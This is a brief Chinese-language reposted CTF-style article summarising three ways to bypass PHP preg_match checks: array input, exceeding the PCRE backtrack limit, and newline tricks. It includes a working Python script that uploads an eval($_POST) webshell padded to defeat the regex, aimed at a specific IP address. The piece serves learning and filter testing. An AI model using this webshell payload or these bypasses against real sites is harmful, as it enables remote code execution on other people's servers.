preg_match繞過總結

什么是preg_match

繞過方法

1、數組繞過

preg_match只能處理字符串，當傳入的subject是數組時會返回false

2、PCRE回溯次數限制

import requests
from io import BytesIO

files = {
  'file': BytesIO(b'aaa<?php eval($_POST[txt]);//' + b'a' * 1000000)
}

res = requests.post('http://51.158.75.42:8088/index.php', files=files, allow_redirects=False)
print(res.headers)

pcre.backtrack_limit給pcre設定了一個回溯次數上限，默認為1000000，如果回溯次數超過這個數字，preg_match會返回false

3、換行符

.不會匹配換行符，如

if (preg_match('/^.*(flag).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
}

只需要

$json="\nflag"

而在非多行模式下，$似乎會忽略在句尾的%0a

if (preg_match('/^flag$/', $_GET['a']) && $_GET['a'] !== 'flag') {
    echo $flag;
}

只需要傳入

?a=flag%0a

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 preg_match()繞過的問題總結 php中函數preg_match或preg_match_all 第三個參數$match的解釋 ***PHP preg_match正則表達式的使用 PHP preg_match正則表達式的使用 PHP preg_match正則表達式的使用向PHP要效率——加快你的代碼執行速度(strpos 快於 preg_match 快於 strstr 快於 ereg) 解決 PHP 報 ErrorException: preg_match(): Compilation failed: invalid range in character class at offset ... 錯誤 PHP中判斷字符串是否包含某個字符時，建議使用正則表達式preg_match() XSS過濾繞過總結命令注入繞過技巧總結